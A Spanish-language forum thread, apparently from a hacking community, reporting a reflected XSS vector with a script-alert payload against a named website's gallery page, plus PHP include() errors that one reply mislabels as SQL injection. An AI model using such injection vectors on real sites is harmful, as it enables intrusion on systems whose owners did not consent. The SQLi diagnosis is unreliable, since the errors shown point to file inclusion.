Url: http://www.nilswogram.com
Url afectado: http://www.nilswogram.com/public/gallery.php?id=5
Vector: "><script>alert(/F0M3T - UNDERC[0]DE/);</script>
Imagen:
(http://i.imgur.com/pqQNOWg.png)
Reportado: Sí.
(http://i.imgur.com/55pvNsz.png)
Creo que también tenga SQLi, mira:
URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
CitarWarning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39
Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39
Compruébalo por favor y repórtalo si eso...
Saludos ((:
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Creo que también tenga SQLi, mira:
URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta: CitarWarning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39
Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39
Compruébalo por favor y repórtalo si eso...
Saludos ((:
Sí me percaté de esa vulnerabilidad, pero no se puede explotar, gracias por la aclaración.
Saludos.